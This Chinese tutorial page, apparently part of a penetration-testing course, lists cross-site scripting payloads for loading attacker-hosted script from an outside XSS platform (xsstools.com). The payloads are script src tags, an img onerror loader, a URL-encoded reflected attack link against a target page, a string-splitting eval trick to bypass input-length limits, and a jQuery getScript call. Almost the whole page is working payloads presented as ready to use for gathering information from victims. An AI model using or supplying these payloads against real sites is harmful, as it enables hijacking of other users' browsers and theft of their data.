1. 首页
  2. 渗透测试

[原创]WEB安全第五章 漏洞学习与利用04xss加载payload

WEB安全第五章 漏洞学习与利用04xss加载payload

当我们在测试xss漏洞的时候,一般都是用h1 alert 简单的html标签 样式是否改变 是否弹出框,来检验是否存在xss漏洞。

当在利用这个xss漏洞获取信息的时候,就要加载payload,加载payload的方法多种多样,以下是常用的加载技巧。

有一些 xss平台已经有一些通用的方法。直接拿到来就可以了。

[原创]WEB安全第五章 漏洞学习与利用04xss加载payload

1、标准script加载

<script src=http://www.xsstools.com/amER></script>
<script src=//www.xsstools.com/amER></script>
[原创]WEB安全第五章 漏洞学习与利用04xss加载payload

2img 创建script加载

<img src=x onerror=document.body.appendChild(document.createElement(‘script’)).src=’//www.xsstools.com/amER’>

反射性

http://target_sys.com/xss/xss01.php?name=%3Cimg%20src=x%20onerror=document.body.appendChild(document.createElement(%27script%27)).src=%27//www.xsstools.com/amER%27%3E

[原创]WEB安全第五章 漏洞学习与利用04xss加载payload

3、字符并接

这种一般是输入的字符有限制的时候使用

<script>z=’document.'</script>

<script>z=z+’write(“‘</script>

<script>z=z+'<script'</script>

<script>z=z+’ src=ht'</script>

<script>z=z+’tp://www.'</script>

<script>z=z+’xsstools'</script>

<script>z=z+’.com/a'</script>

<script>z=z+’mER></sc'</script>

<script>z=z+’ript>”)'</script>

<script>eval(z)</script>

4jquery加载

<script src=”http://code.jquery.com/jquery-1.9.1.min.js”></script>

<script>$.getScript(“//www.xsstools.com/amER”);</script>

原创文章,作者:mOon,如若转载,请注明出处:https://www.moonsec.com/archives/235

联系我们

400-800-8888

在线咨询:点击这里给我发消息

邮件:admin@example.com

工作时间:周一至周五,9:30-18:30,节假日休息